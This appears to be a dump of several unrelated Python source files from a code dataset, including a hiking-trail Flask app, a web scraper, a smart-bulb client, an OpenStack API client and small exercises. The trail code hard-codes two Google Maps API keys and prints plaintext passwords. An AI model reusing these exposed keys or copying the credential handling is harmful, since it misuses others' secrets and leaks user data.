model.db.session.commit()
else:
print "Review for this trail by user already in database."
def add_trek_to_users_trails(id_of_trail):
"""Check to see if trek is already in user's trails.
If it isn't, add to Trek database"""
user_treks = check_user_treks(id_of_trail)
print "PRINT USER TREKS: ", user_treks
if user_treks == None:
print "HERE - NONE"
trek = model.Trek(user_id = session['user_id'],
trail_id = id_of_trail)
model.db.session.add(trek)
model.db.session.commit()
return "NEW TRAIL ADDED TO TREK DB."
elif user_treks != None:
return "TRAIL ALREADY EXISTS IN DATABASE."
def check_user_treks(id_of_trail):
    """Return 'Trek in database' when the user already saved this trail, else None."""
    match = model.db.session.query(model.Trek).filter(
        model.Trek.user_id == session['user_id'],
        model.Trek.trail_id == id_of_trail).first()
    return None if match is None else 'Trek in database'
def extract_relevant_trail_info(trail_object):
"""Extract relevant trail info from trail object for use in
map on front end
"""
trail = trail_object
difficulty = trail_difficulty_conversion(trail.trail_difficulty)
print "RELEVANT TRAIL INFO PRINT TESTS"
print "Difficulty: ", difficulty
alt_delta = trail.trail_high_alt - trail.trail_low_alt
print "Alt Delta: ",alt_delta
trailhead_lat = trail.trailhead_latitude
trailhead_long = trail.trailhead_longitude
print trailhead_lat, trailhead_long
return [trailhead_lat, trailhead_long, trail.trail_name, trail.trail_length, trail.trail_id, difficulty, trail.trail_description, alt_delta, trail.trail_picture]
def get_dirxns(starting_address, trail_coordinates):
    """Fetch Google Directions from `starting_address` to `trail_coordinates`.

    Returns the raw requests.Response object (callers must call .json());
    the parsed body is printed here only for debugging.
    """
    # NOTE(review): the API key is hard-coded in the URL -- move it to
    # config/secrets.  Neither parameter is URL-encoded, so values
    # containing spaces or '&' may break the query string.
    dirxns = requests.get("http://maps.googleapis.com/maps/api/directions/json?origin="+starting_address+"&destination="+trail_coordinates+"&key=AIzaSyBZF-t6AgPD_FNUmxTd5M9gITpYKJDOmHs")
    dirxns_post_json = dirxns.json()
    print dirxns_post_json
    return dirxns
def get_trail_object_by_id(t_id):
    """Return the Trail row with primary key `t_id`, or None.

    A falsy id short-circuits to None *before* touching the database; the
    original always ran the query and then discarded the result.
    """
    if not t_id:
        return None
    return model.db.session.query(model.Trail).filter(model.Trail.trail_id==t_id).first()
def add_user_to_database(username, password):
"""Check to see if user is in database. If they aren't add them."""
user_name_check = model.db.session.query(model.User).filter(model.User.user_name==username).first()
print user_name_check
if user_name_check == None:
print username
print password
user = model.User(user_name = username,
user_password = password)
model.db.session.add(user)
model.db.session.commit()
print "<Added user %s to database>" % username
return True
else:
print "<User %s is already in the database>" % username
return False
def find_lat_lng(city, state):
"""
Find lat/long for address given by user.
Uses Google Maps API & Hiking Project API.
Information passed from HTML form to this function.
"""
if city == "":
print "Missing city"
return None
if state == "":
print "Missing state"
return None
try:
geocode_request = requests.get("https://maps.googleapis.com/maps/api/geocode/json?address="+city+","+state+",US&key=AIzaSyCNFFFQco261DBnttijOE0NL_mAx6Mz86g")
json_geocode = geocode_request.json()
lat,lng = json_geocode['results'][0].get('geometry').get('location').values()
coordinates = (str(lat),str(lng),)
print coordinates
return coordinates
except:
return None
def check_user_credentials(username, password):
    """Return the User row when the password verifies; otherwise False."""
    user = model.db.session.query(model.User).filter(
        model.User.user_name == username).first()
    if user and password_hashing.hashed_password_check(username, password):
        return user
    return False
def find_trails(coordinates, radius='25'):
    """Query the Hiking Project API for trails near (lat, lng).

    `coordinates` is the (lat, lng) string pair from find_lat_lng;
    `radius` is the search distance, passed through as a string.
    Returns the API's list of trail dicts.
    """
    lat, lng = coordinates
    url = ("https://www.hikingproject.com/data/get-trails?lat=" + lat +
           "&lon=" + lng + "&maxDistance=" + radius + "&minLength=1&key=" +
           hp_api_key)
    response = requests.get(url)
    return response.json()["trails"]
def select_trails(trails):
"""Selects three random trails from trail_packet from find_trails
"""
print "***PRINT TRAIL TYPE*** ", type(trails)
if len(trails) == 0:
return None
else:
return trails
# NOTE: Keeping logic below in case I want to revert
# elif len(trails) < 4:
# selected_trails = trails
# # TODO: give message on route side that states user may want to widen search criteria
#
# return selected_trails
#
# elif len(trails) >=4:
# selected_trails = []
# random.shuffle(trails)
# first_trail = trails.pop()
# selected_trails.append(first_trail)
# second_trail = trails.pop()
# selected_trails.append(second_trail)
# third_trail = trails.pop()
# selected_trails.append(third_trail)
#
# return selected_trails
def add_trails_to_db(trails):
"""Adds user selected trail to db"""
for trail in trails:
# print "LENGTH OF TRAILS: ", len(trails)
# print "TRAIL NAME: ", trail['name']
# print "TYPE: ", type(trail)
trail_difficulty = trail_difficulty_conversion(trail['difficulty'])
#FIXME: Should I move this under the if statement for optimization???
trail_status = model.db.session.query(model.Trail).filter(model.Trail.trail_id==trail['id']).first()
if trail_status == None:
# If there is no trail with a matching trail id in the database, create new trail_object
trail_object = model.Trail(trail_id = trail['id'],
trail_name = trail['name'],
trailhead_latitude = trail['latitude'],
trailhead_longitude = trail['longitude'],
trail_length = trail['length'],
trail_difficulty = trail_difficulty,
trail_description = trail['summary'],
trail_high_alt = trail['high'],
trail_low_alt = trail['low'],
trail_location = trail['location'],
trail_picture = trail['imgMedium'])
model.db.session.add(trail_object)
model.db.session.commit()
print "<Added trail %s to database>" % trail['id']
else:
print "<Trail %s is already in the database>"
def get_trail_conditions(trail_id):
"""Calls Hiking Project API for trail conditions using trail_id."""
trail_id = str(trail_id)
conditions_request = requests.get("https://www.hikingproject.com/data/get-conditions?ids="+trail_id+"&key="+hp_api_key)
json_conditions = conditions_request.json()
response = json_conditions["0"]
trail_name_by_id = response.get("name")#.values()
print "TRAIL NAME BY ID: ", trail_name_by_id
trail_status_details =response.get("conditionStatus")#.values()
print "TRAIL STATUS DETAILS: ", trail_status_details
trail_status_color = response.get("conditionColor")#.values()
print "TRAIL STATUS COLOR: ", trail_status_color
trail_status_date = response.get("conditionDate")
if trail_status_date.startswith("1970"):
# Checks to see if there's a relevant trail condition report
trail_deets = None
print "NO REPORT AVAILABLE"
return trail_deets
elif trail_status_details.lower().startswith("unknown"):
trail_deets = None
print "NO REPORT AVAILABLE"
return trail_deets
trail_deets = (trail_name_by_id, trail_status_details, trail_status_color, trail_status_date,)
return trail_deets
def filter_trek_length(trails, trek_length):
    """Return only the trails whose 'length' is at most `trek_length`.

    `trails` is a list of Hiking Project trail dicts; order is preserved.
    """
    # List comprehension replaces the manual append loop (same semantics).
    return [trail for trail in trails if trail['length'] <= trek_length]
def filter_trek_difficulty(trails_filtered_by_length, trail_difficulty):
"""Take trail list-object & filter trails by difficulty
Called in select_trails()"""
if trail_difficulty == "no-preference":
# don't filter by difficulty --this list is the list we want to return.
list_of_trails = trails_filtered_by_length
return list_of_trails
else:
list_of_trails = []
for trail in trails_filtered_by_length:
trail_difficulty_rating = trail['difficulty']
# from trail object, passed to conversion function
print trail_difficulty_rating
difficulty = trail_difficulty_conversion(trail_difficulty_rating)
print "DIFFICULTY: ", difficulty
if (difficulty == "easy" or difficulty == "easy/intermediate") and trail_difficulty == "easy":
list_of_trails.append(trail)
elif (difficulty == "intermediate" or difficulty == "easy/intermediate" or difficulty == "intermediate/difficult") and trail_difficulty == "moderate":
list_of_trails.append(trail)
elif (difficulty == "intermediate/difficult" or difficulty == "difficult" or difficulty == "very difficult") and trail_difficulty == "difficult":
list_of_trails.append(trail)
return list_of_trails
def trail_difficulty_conversion(trail_difficulty_rating):
    """Translate a Hiking Project color rating into a descriptive label.

    Unrecognised ratings map to "unknown".  A lookup table replaces the
    six-branch elif chain with identical results.
    """
    conversion = {
        "green": "easy",
        "greenBlue": "easy/intermediate",
        "blue": "intermediate",
        "blueBlack": "intermediate/difficult",
        "black": "difficult",
        "dblack": "very difficult",
    }
    return conversion.get(trail_difficulty_rating, "unknown")
def show_logout_button():
    """True when a user is logged in, so the front end shows the logout button."""
    return bool(session.get('user_id'))
| true |
32c2de1bcb6a8fb264a0db9745a8e1c2c4f50a88 | Python | kkiyama117/enterlist | /enterlist/models.py | UTF-8 | 1,165 | 2.796875 | 3 | [
"MIT"
] | permissive | class Enter:
    def __init__(self, enter_id: str, name: str, univ: str, department: str,
                 gender: str, interview: str, industry: str, demand: str, line: str, checked: bool = False):
        """Store the applicant's profile; `checked` seeds the handled flag."""
        self.enter_id = enter_id
        self.name = name
        self.univ = univ
        self.department = department
        self.gender = gender
        self.interview = interview
        self.industry = industry
        self.demand = demand
        self.line = line
        # Backing field for the `checked` property.
        self._checked = checked
    def __str__(self):
        # The string form is just the entrant id (useful for logging).
        return self.enter_id
    def check(self):
        # Mark the entrant as checked; there is no way to un-check.
        self._checked = True
@property
def checked(self):
return self.checked
    def detail(self) -> str:
        """Build a multi-line, human-readable profile of this entrant.

        The field labels are user-facing Japanese text; keep them as-is.
        """
        text: str = f'名前: {self.name} \n 学部: {self.department} \n' \
                    f'性別: {self.gender} \n' \
                    f'希望面談内容: {self.interview} \n' \
                    f'志望業界: {self.industry} \n' \
                    f'メンターへの希望: {self.demand} \n' \
                    f'LINE ID: {self.line}'
        return text
class Mentor:
    """Minimal mentor record holding a display name and a Slack id."""

    def __init__(self, name: str, slack_id):
        # Both attributes are private; no accessors are defined yet.
        self._name = name
        self._slack_id = slack_id
| true |
897c9444b0037f957262a72cd270775ccf77bf25 | Python | amg369/Web-Development-Project | /Models/RegisterModel.py | UTF-8 | 648 | 2.921875 | 3 | [] | no_license | import pymongo
from pymongo import MongoClient
import bcrypt
class RegisterModel:
    """Handles user registration against the `bonesfan` Mongo database."""

    def __init__(self):
        # One Mongo client per model instance; `users` holds registrations.
        self.client = MongoClient()
        self.db = self.client.bonesfan
        self.Users = self.db.users

    def add_user(self, data):
        """Insert a new user document, storing a bcrypt hash of the password.

        `data` is expected to expose `username`, `name` and `password`
        attributes (e.g. a registration form object).
        """
        # Bug fix: the original computed `hashed` but then stored the
        # plain-text password, and ran a hard-coded debug `checkpw` that
        # could never succeed against an unhashed stored value.
        hashed = bcrypt.hashpw(data.password.encode(), bcrypt.gensalt())
        uid = self.Users.insert({"username": data.username, "name": data.name, "password": hashed})
        print("uid is", uid)
| true |
ca0d30edd5b010308b5bde61b421b8a242d7de63 | Python | Paul9inee/Elementary_Algorithm | /sajun_Test/03_review.py | UTF-8 | 384 | 3.0625 | 3 | [] | no_license | import heapq
def solution(no, works): # max heap 만들기
works = [-1 * x for x in works] # min heap으로만 되어있기 떄문에 음수로 변환
heapq.heapify(works)
while no != 0:
max_val = heapq.heappop(works)
if max_val == 0:
break
heapq.heappush(works, max_val + 1)
no -= 1
return sum([i ** 2 for i in works])
| true |
890e01578d4f18a4172799f76700ded5d2b250fb | Python | shreyansh-sawarn/Hacktoberfest | /Python/ScrapBBCnews.py | UTF-8 | 1,189 | 3.90625 | 4 | [] | no_license | '''
Script to scrap the headlines of BBC News website
and gives the headlines with Links
'''
'''
Program uses requests module to get web data from URL and BeautifulSoup module to parse the web data
as HTML using html parser.
Install requests and BeautifulSoup module before executing!
'''
import requests
from bs4 import BeautifulSoup
import pprint # prints the Final output in pretty manner which is inbuilt module in Python
response = requests.get("https://www.bbc.com/")
parsed_html = BeautifulSoup(response.text,'html.parser') #parsing the received web data by html parser
headlines_links = parsed_html.select('.media__link') #All links of Headlines news are included in class "media__link"
def bbcHeadlines(headlines_links):
    """Return a list of {'HeadLines ', 'Link'} dicts, one per headline anchor.

    Relative hrefs are resolved against https://www.bbc.com.
    """
    news = []
    for anchor in headlines_links:
        headline = anchor.get_text('\n', strip=True)
        href = anchor.get('href')
        full_link = href if href.startswith('https') else 'https://www.bbc.com' + href
        news.append({'HeadLines ': headline, 'Link': full_link})
    return news
pprint.pprint(bbcHeadlines(headlines_links))
| true |
c0c88a2188801a4035728bf96f6463f6343d0838 | Python | ohassa/code-eval | /p011.py | UTF-8 | 1,192 | 3.21875 | 3 | [] | no_license | import sys
TOP_NODE_VALUE = '30'
node30 = {'value': TOP_NODE_VALUE, 'parent': None}
node8 = {'value': '8', 'parent': node30}
node52 = {'value': '52', 'parent': node30}
node3 = {'value': '3', 'parent': node8}
node20 = {'value': '20', 'parent': node8}
node10 = {'value': '10', 'parent': node20}
node29 = {'value': '29', 'parent': node20}
TREE = (
(node30),
(node8, node52),
(node3, node20),
(node10, node29)
)
NODE_VALUE_TO_LEVEL_MAP = {
TOP_NODE_VALUE: 0,
'8': 1,
'52': 1,
'3': 2,
'20': 2,
'10': 3,
'29': 3
}
del node30, node8, node52, node3, node20, node10, node29
for line in open(sys.argv[1]):
node1Value, node2Value = line.split()
level1, level2 = NODE_VALUE_TO_LEVEL_MAP[node1Value], NODE_VALUE_TO_LEVEL_MAP[node2Value]
if node1Value == TOP_NODE_VALUE or node2Value == TOP_NODE_VALUE:
print(TOP_NODE_VALUE)
continue
if level1 == level2:
node1IndexInLevel = 0
else:
# make sure node1 is at a higher level than node2
if level1 > level2:
node1Value, node2Value = node2Value, node1Value
level1, level2 = level2, level1
node1IndexInLevel = 0 if TREE[level1][0]['value'] == node1Value else 1
print(TREE[level1][node1IndexInLevel]['parent']['value']) | true |
09cfc2278b44262a0f1e46215a5fb9a0657136d0 | Python | dawgster/NikoHack | /bulb.py | UTF-8 | 1,771 | 2.53125 | 3 | [] | no_license | #!/usr/bin/env python3
import requests
from dotenv import load_dotenv
import os
load_dotenv()
def set_bulb_color(h, s, v):
    """Set the smart bulb's colour via the gateway's REST API.

    h, s, v: colour components, sent as a comma-joined string.
    Raises RuntimeError when the required environment variables are missing.
    """
    ip = os.getenv("raspi_ip")
    object_id_bulb = os.getenv("object_id_bulb")
    # Fail fast when the gateway address or the bulb id is not configured.
    if ip is None:
        raise RuntimeError("Undefined environment variable `raspi_ip`")
    if object_id_bulb is None:
        raise RuntimeError("Undefined environment variable `object_id_bulb`")
    url = 'http://' + ip + ":9997/agent/remote/objects/" + object_id_bulb + "/properties/Bulb2_Color"
    headers = {
        'Content-Type': 'application/json',
        'infrastructure-id': 'VAS',
        'adapter-id': 'HackathonSampleService'
    }
    # NOTE(review): the payload is not strict JSON ({value:'...'}); the
    # gateway presumably accepts this relaxed form — confirm before changing.
    data = "{value:'" + str(h) + "," + str(s) + "," + str(v) + "'}"
    # Response is intentionally ignored (fire-and-forget).
    r = requests.put(url=url, data=data, headers=headers)
def flash_bulb_color():
    """
    Flashes the current color. Set the color with `set_bulb_color`.
    """
    ip = os.getenv("raspi_ip")
    object_id_bulb = os.getenv("object_id_bulb")
    # Fail fast when the gateway address or the bulb id is not configured.
    if ip is None:
        raise RuntimeError("Undefined environment variable `raspi_ip`")
    if object_id_bulb is None:
        raise RuntimeError("Undefined environment variable `object_id_bulb`")
    url = 'http://' + ip + ":9997/agent/remote/objects/" + object_id_bulb + "/properties/Bulb2_Alert"
    headers = {
        'Content-Type': 'application/json',
        'infrastructure-id': 'VAS',
        'adapter-id': 'HackathonSampleService'
    }
    # 'LSELECT' selects the flashing alert mode — presumably a Hue-style
    # long alert; confirm with the gateway documentation.
    data = "{value:'LSELECT'}"
    # Response is intentionally ignored (fire-and-forget).
    r = requests.put(url=url, data=data, headers=headers)
def bulb_set_disabled_status():
    """Show the 'disabled' status colour (no flash)."""
    set_bulb_color(0.6*255, 0, 0)
def bulb_set_parcel_status():
    """Show the 'parcel' status colour, then flash it."""
    set_bulb_color(0.6*255, 100, 50)
    flash_bulb_color()
def bulb_set_security_status():
    """Show the 'security' status colour, then flash it."""
    set_bulb_color(0, 100, 10)
    flash_bulb_color()
| true |
d991eb857e5c5fbe977540b6f9b9e2821d4b0c46 | Python | MrHamdulay/csc3-capstone | /examples/data/Assignment_4/lphrof001/ndom.py | UTF-8 | 1,204 | 2.9375 | 3 | [] | no_license | def ndom_to_decimal(a):
a=str(a)
if len(a)==3:
t=a[0]
u=a[1]
v=a[2]
w=int(t)
x=int(u)
y=int(v)
return(w*36+x*6+y*1)
elif len(a)==2:
p=a[0]
q=a[1]
r=int(p)
s=int(q)
return(r*6+s*1)
if len(a)==1:
b=a[0]
c=int(b)
return(c*1)
def decimal_to_ndom(a):
    """Convert a non-negative decimal integer to its ndom (base-6) form.

    The result is an int whose decimal digits are the base-6 digits of `a`
    (e.g. 10 -> 14).  Bug fixes versus the original: values below 6 were
    printed instead of returned (returning None), 6 itself fell through
    every branch, and 7..35 were returned unconverted.
    """
    digits = []
    n = a
    # Repeated divmod by 6 yields the base-6 digits, least significant first.
    while True:
        n, r = divmod(n, 6)
        digits.append(str(r))
        if n == 0:
            break
    return int(''.join(reversed(digits)))
def ndom_add(a, b):
    """Add two ndom (base-6) numbers and return the ndom result."""
    total = ndom_to_decimal(a) + ndom_to_decimal(b)
    return decimal_to_ndom(total)
def ndom_multiply(a, b):
    """Multiply two ndom (base-6) numbers and return the ndom result."""
    product = ndom_to_decimal(a) * ndom_to_decimal(b)
    return decimal_to_ndom(product)
| true |
028272657a28a56865be5a41ff85042bf50fd928 | Python | pikamar/container-form | /app/test/api.py | UTF-8 | 1,185 | 3.015625 | 3 | [] | no_license | import json
import requests
url = 'http://0.0.0.0:5000/api/data'
headers = {'Accept': 'application/json'}
post_headers = {'Accept': 'application/json',
'Content-Type': 'application/json'}
# Make a POST request to create an object in the database.
data = {
'status': 'active'
}
print(json.dumps(data))
response = requests.post(url, data=json.dumps(data), headers=post_headers)
assert response.status_code == 201
# Make a GET request for the entire collection.
response = requests.get(url, headers=headers)
assert response.status_code == 200
print(response.json())
# Make a GET request for an individual instance of the model.
response = requests.get(url + '/1', headers=headers)
assert response.status_code == 200
print(response.json())
# Use query parameters to make a search. `requests.get` doesn't like
# arbitrary query parameters, so be sure that you pass a dictionary
# whose values are strings to the keyword argument `params`.
#filters = [dict(name='name', op='like', val='%y%')]
#params = {'filter[objects]': json.dumps(filters)}
#response = requests.get(url, params=params, headers=headers)
#assert response.status_code == 200
#print(response.json()) | true |
288cc0936a05a60382c25476ce7ad4669fbf5db8 | Python | yakhira/conversation-bot | /Allison/conversation_bot/watson_tone_analizer.py | UTF-8 | 792 | 2.53125 | 3 | [] | no_license | from watson_developer_cloud import ToneAnalyzerV3
class watson_tone_analizer(object):
    """Tone analizer by IBM Watson"""

    def __init__(self, username, password, version="2016-05-19"):
        self.username = username
        self.password = password
        self.version = version

    def tone_analizer(self, text):
        """Send `text` to the IBM Watson tone analyzer service.

        Returns the name of the last tone in the first tone category whose
        score exceeds 0.5, or None when no tone is that strong.
        """
        toneanalizer = ToneAnalyzerV3(
            username=self.username,
            password=self.password,
            version=self.version
        )
        response = toneanalizer.tone(
            text=text
        )
        # Bug fix: the original rebound the loop variable itself, so when no
        # score exceeded 0.5 it returned the last raw tone dict, not None.
        tone_name = None
        for tone in response["document_tone"]["tone_categories"][0]["tones"]:
            if tone["score"] > 0.5:
                tone_name = tone["tone_name"]
        return tone_name
| true |
ee70a30c09ccc35bbfd756468550a031f9acc506 | Python | rushiagr/myutils | /archive/openstack_api.py | UTF-8 | 15,351 | 2.6875 | 3 | [
"MIT"
] | permissive | #!/usr/bin/python
import httplib
import json
class API(object):
"""API object to connect to an OpenStack environment."""
def __init__(self, osurl=None, osuser=None, ospassword=None):
self.url = osurl or "10.63.165.20"
self.osuser = osuser or "demo"
self.ospassword = ospassword or "nova"
self.tenant_id = None
self.default_header = {"Content-Type": "application/json"}
self.keystone_host = self.url + ":5000"
self.cinder_host = self.url + ":8776"
self.tenant_id = self.get_tenant_id_for_user()
self.token = self.get_token()
def send_request(self, request_type, host, url, params=None, headers=None):
"""
Sends the request with provided parameters and returns back the
data returned from the request (if any).
"""
if isinstance(params, dict):
params = json.dumps(params)
conn = httplib.HTTPConnection(host)
conn.set_debuglevel(1)
conn.request(request_type, url, params, headers or self.default_header)
if request_type == "DELETE":
return
response = conn.getresponse()
data = response.read()
datadict = json.loads(data)
conn.close()
return datadict
def get_post_data(self, host, url, params, headers=None):
"""
Get data for a POST request.
:param host: e.g. '10.10.0.110:5000'
:param url: e.g. '/v1/tokens'
:param params: Stringified parameter dict
:param headers: Headers dict, e.g. {"X-Auth-Token":"blah"}
"""
if isinstance(params, dict):
params = json.dumps(params)
conn = httplib.HTTPConnection(host)
conn.set_debuglevel(1)
conn.request("POST", url, params, headers or self.default_header)
response = conn.getresponse()
data = response.read()
datadict = json.loads(data)
conn.close()
return datadict
def get_get_data(self, host, url, headers=None):
"""
Get data for a GET request.
:param host: e.g. '10.10.0.110:5000'
:param url: e.g. '/v1/tokens'
:param headers: Headers dict, e.g. {"X-Auth-Token":"blah"}
"""
conn = httplib.HTTPConnection(host)
conn.set_debuglevel(1)
print 'get called. headers: ', headers or self.default_header
conn.request("GET", url, None, headers or self.default_header)
response = conn.getresponse()
data = response.read()
print 'data', data
datadict = json.loads(data)
conn.close()
return datadict
def get_tenant_id_for_user(self, user=None, password=None):
"""
The method first queries keystone and gets a small token to get the
tenant ID, and then uses this tenant ID to generate a full PKI token.
"""
# Get token to query tenant ID
param_dict = {
"auth": {
"passwordCredentials": {
"username": user or self.osuser,
"password": user or self.ospassword
}
}
}
params = json.dumps(param_dict)
datadict = self.get_post_data(self.keystone_host,
"/v2.0/tokens",
params,
self.default_header)
tenant_id_token = datadict['access']['token']['id']
# Now get the tenant ID
header = {"X-Auth-Token": tenant_id_token}
datadict = self.get_get_data(self.keystone_host,
"/v2.0/tenants",
header)
for tenant_dict in datadict['tenants']:
if tenant_dict['name'] == (user or self.osuser):
print 'tenant_name:', tenant_dict['name'], 'tenant_id', tenant_dict['id']
return str(tenant_dict['id'])
raise
def get_token(self):
"""
Returns the token for the given {osuser,ospassword,tenant_id} tuple.
"""
auth_string = {
"auth" : {
"passwordCredentials": {
"username": self.osuser,
"password": self.ospassword
},
"tenantId": self.tenant_id
}
}
params = json.dumps(auth_string)
headers = {"Content-Type": "application/json"}
conn = httplib.HTTPConnection(self.keystone_host)
conn.request("POST", "/v2.0/tokens", params, headers)
# HTTP response
response = conn.getresponse()
data = response.read()
datadict = json.loads(data)
conn.close()
token = datadict['access']['token']['id']
return str(token)
# All the cinder volume functions
def cinder_create(self, size):
headers = self.default_header
headers["X-Auth-Token"] = self.token
params = {"volume": {"size": size}}
data = self.get_post_data(self.cinder_host,
'/v1/%s/volumes' % self.tenant_id,
params,
headers)
return data
# def cinder_share_create(self, size, proto):
# headers = self.default_header
# headers["X-Auth-Token"] = self.token
# params = {"share": {"size": size,
# "share_type": proto}}
# data = self.get_post_data(self.cinder_host,
# '/v1/%s/shares' % self.tenant_id,
# params,
# headers)
# return data
def cinder_list(self):
headers = self.default_header
headers["X-Auth-Token"] = self.token
data = self.get_get_data(self.cinder_host,
'/v1/%s/volumes' % self.tenant_id,
headers)
return data
def cinder_list_detail(self):
headers = self.default_header
headers["X-Auth-Token"] = self.token
data = self.get_get_data(self.cinder_host,
'/v1/%s/volumes/detail' % self.tenant_id,
headers)
return data
def cinder_list_v2(self):
headers = self.default_header
headers["X-Auth-Token"] = self.token
data = self.get_get_data(self.cinder_host,
'/v2/%s/volumes' % self.tenant_id,
headers)
return data
def cinder_list_detail_v2(self):
headers = self.default_header
headers["X-Auth-Token"] = self.token
data = self.get_get_data(self.cinder_host,
'/v2/%s/volumes/detail' % self.tenant_id,
headers)
return data
def cinder_snapshot_list(self):
headers = self.default_header
headers["X-Auth-Token"] = self.token
data = self.get_get_data(self.cinder_host,
'/v2/%s/snapshots' % self.tenant_id,
headers)
return data
# def cinder_share_list(self):
# headers = self.default_header
# headers["X-Auth-Token"] = self.token
# data = self.get_get_data(self.cinder_host,
# '/v1/%s/shares' % self.tenant_id,
# headers)
# return data
def cinder_delete(self, vol_id):
headers = self.default_header
headers["X-Auth-Token"] = self.token
data = self.send_request("DELETE",
self.cinder_host,
'/v1/%s/volumes/%s' % (self.tenant_id,
vol_id))
return data
def cinder_delete_all(self):
"""
Deletes all the volumes present in Cinder. As of this version,
it tries to delete the volumes which are not in 'available' and
'error' states too.
"""
list_data = self.cinder_list()
volumes = list_data['volumes']
volume_ids = []
for volume in volumes:
volume_ids.append(str(volume['id']))
for volume_id in volume_ids:
self.cinder_delete(volume_id)
print "successfully deleted all volumes"
return
def cinder_create_many(self, vol_number, vol_sizes=[1]):
"""
Creates volumes equal to :vol_number: with sizes as per list
:vol_sizes:. If there are more volumes than elements in list
:vol_sizes:, a default value of 1GB will be used.
"""
if vol_number > len(vol_sizes):
vol_sizes.extend([1]*(vol_number-len(vol_sizes)))
for vol_index in range(vol_number):
self.cinder_create(vol_sizes[vol_index])
# All the cinder SHARE functions
def cinder_share_create(self, size, proto):
headers = self.default_header
headers["X-Auth-Token"] = self.token
params = {"share": {"size": size,
"share_type": proto}}
data = self.get_post_data(self.cinder_host,
'/v1/%s/shares' % self.tenant_id,
params,
headers)
return data
def cinder_share_allow(self, share_id, access_type, access_to):
headers = self.default_header
headers["X-Auth-Token"] = self.token
params = {"os-allow_access": {"access_type": access_type,
"access_to": access_to}}
data = self.get_post_data(self.cinder_host,
'/v1/%s/shares/%s/action' % (self.tenant_id,share_id),
params,
headers)
return data
def cinder_share_deny(self, share_id, access_id):
headers = self.default_header
headers["X-Auth-Token"] = self.token
params = {"os-deny_access": {"access_id": access_id}}
data = self.get_post_data(self.cinder_host,
'/v1/%s/shares/%s/action' % (self.tenant_id,share_id),
params,
headers)
return data
def cinder_share_access_list(self, share_id):
headers = self.default_header
headers["X-Auth-Token"] = self.token
params = {"os-access_list": None}
data = self.get_post_data(self.cinder_host,
'/v1/%s/shares/%s/action' % (self.tenant_id,share_id),
params,
headers)
return data
#TODO(rushiagr): merge this def into the above one
def cinder_share_create_from_snapshot(self, size, proto, snap_id):
headers = self.default_header
headers["X-Auth-Token"] = self.token
params = {"share": {"size": size,
"share_type": proto,
"share_id": snap_id}}
data = self.get_post_data(self.cinder_host,
'/v1/%s/shares' % self.tenant_id,
params,
headers)
return data
def cinder_share_list(self):
headers = self.default_header
headers["X-Auth-Token"] = self.token
data = self.get_get_data(self.cinder_host,
'/v1/%s/shares' % self.tenant_id,
headers)
return data
def cinder_share_snapshot_list(self):
headers = self.default_header
headers["X-Auth-Token"] = self.token
data = self.get_get_data(self.cinder_host,
'/v1/%s/share-snapshots' % self.tenant_id,
headers)
return data
def cinder_share_show(self, share_id):
headers = self.default_header
headers["X-Auth-Token"] = self.token
data = self.get_get_data(self.cinder_host,
'/v1/%s/shares/%s' % (self.tenant_id, share_id),
headers)
return data
def cinder_share_list_detail(self):
headers = self.default_header
headers["X-Auth-Token"] = self.token
data = self.get_get_data(self.cinder_host,
'/v1/%s/shares/detail' % self.tenant_id,
headers)
return data
def cinder_share_delete(self, vol_id):
headers = self.default_header
headers["X-Auth-Token"] = self.token
data = self.send_request("DELETE",
self.cinder_host,
'/v1/%s/shares/%s' % (self.tenant_id,
vol_id))
return data
def cinder_share_snapshot_create(self, shr_id):
headers = self.default_header
headers["X-Auth-Token"] = self.token
params = {"share-snapshot": {"share_id": shr_id,
#"display_name": "timepass_name"
}}
data = self.get_post_data(self.cinder_host,
'/v1/%s/share-snapshots' % self.tenant_id,
params,
headers)
return data
def cinder_share_snapshot_delete(self, shr_id):
headers = self.default_header
headers["X-Auth-Token"] = self.token
params = {"share-snapshot": {"share_id": shr_id,
#"display_name": "timepass_name"
}}
data = self.get_post_data(self.cinder_host,
'/v1/%s/share-snapshots' % self.tenant_id,
params,
headers)
return data
def cinder_share_delete_all(self):
"""
Deletes all the volumes present in Cinder. As of this version,
it tries to delete the volumes which are not in 'available' and
'error' states too.
"""
list_data = self.cinder_share_list()
shares = list_data['shares']
share_ids = []
for share in shares:
share_ids.append(str(share['id']))
for share_id in share_ids:
self.cinder_share_delete(share_id)
print "successfully deleted all volumes"
return
def cinder_share_create_many(self, vol_number, vol_sizes=[1]):
"""
Creates volumes equal to :vol_number: with sizes as per list
:vol_sizes:. If there are more volumes than elements in list
:vol_sizes:, a default value of 1GB will be used.
"""
if vol_number > len(vol_sizes):
vol_sizes.extend([1]*(vol_number-len(vol_sizes)))
for vol_index in range(vol_number):
self.cinder_create(vol_sizes[vol_index])
if __name__ == '__main__':
a = API() | true |
1fca490f63d02dc921728dd22f0a01eeb2927ae8 | Python | mpostaire/deathstick | /turret.py | UTF-8 | 3,276 | 2.875 | 3 | [] | no_license | import string
import random
import time
import cocos
from cocos.text import Label
import cocos.euclid as eu
import cocos.collision_model
from projectile import Projectile
import cocos.euclid as eu
def predict_pos(vec_orig, speed_mag, vec_pos, vec_dir, delta, epsilon):
diff_old, diff = None, None
delta = delta/2
old_pos = vec_pos
while diff is None or diff_old is None or ((diff - diff_old) > epsilon):
diff_old = diff
#print(vec_pos.magnitude())
delta = delta + 1
#compute next target's pos
old_pos = vec_pos
vec_pos = vec_pos + delta * vec_dir
#compute vector of aim
orig_dir = (vec_pos - vec_orig).normalize() * speed_mag
#compute next proj pos
vec_orig = vec_orig + delta * orig_dir
diff = (vec_orig - vec_pos).magnitude()
if diff_old is not None and diff > diff_old:
return old_pos
return vec_pos
MAX_LEVEL = 10
class Turret():
def __init__(self, pos, delay, dist, speed, ammo_type, bullet_len, level):
self.pos = eu.Vector2(pos[0], pos[1])
self.delay = delay
self.dist = dist
self.bullet_len = bullet_len
self.speed = speed
self.timer = delay
self.level = level
self.ammo_type = ammo_type# shape (characters) of the ammunitions
self.projectiles = [] #all the bullets it shot that are still alive
self.vec_player = None #a temporary variable used for inner computation
self.bullet_count = 0
def activate(self, layer, player):
#the zero indexing is used to pass raw reference wrapped inside an array
#dirty and hacky but it works just fine :)
self.player = player[0]
self.layer = layer[0]
def update(self, delta):
#update the logic of the turrets according to the delta time ellapsed
self.vec_player = eu.Vector2(self.player.x, self.player.y)
#diff is the vector between the player and the turret
diff = next_ppos = predict_pos(
self.pos,
self.speed,
self.vec_player,
self.player.vec_speed,
delta,
5.0
) - self.pos
self.timer -= delta#used to implement firing speed
#check if the player is close enough
if self.timer <= 0 and diff.magnitude() < self.dist:
